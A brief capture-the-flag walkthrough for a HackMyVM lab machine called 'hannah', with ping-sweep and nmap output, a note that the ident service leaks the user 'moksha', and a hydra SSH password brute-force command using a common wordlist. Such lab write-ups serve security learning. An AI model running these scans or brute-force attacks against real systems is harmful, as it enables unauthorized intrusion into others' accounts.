❯ fping -aqg 10.0.0.0/24
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.161
❯ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.161
Starting Nmap 7.93 ( <https://nmap.org> ) at 2023-01-05 23:58 +0545
Nmap scan report for 10.0.0.161
Host is up (0.00097s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey:
| 3072 5f1c78369905320982d3d5054c1475d1 (RSA)
| 256 0669ef979b34d7f3c79660d1a1ffd82c (ECDSA)
|_ 256 853dda74b2684ea6f7e5f58540902e9a (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 1 disallowed entry
|_/enlightenment
|_auth-owners: moksha
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
113/tcp open ident?
|_auth-owners: root
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan gives robots.txt and a URL.
Will look into auth-owners: moksha. Moksha in Hinduism or Buddhism is related to Spirituality (freeing of the soul). In this case, it might be a user.
auth-owners NSE script - Nmap Scripting Engine documentation
The above link gave information about auth-owners.
So, port 113 is an auth server as per the documentation.
Anyways, Nmap automatically gave the service owners.
~/hackmyvm/hannah ❯ hydra -l moksha -P ~/rockyou.txt ssh://10.0.0.161 -V
Gives password.
Performed a linpeas scan but things were obvious too.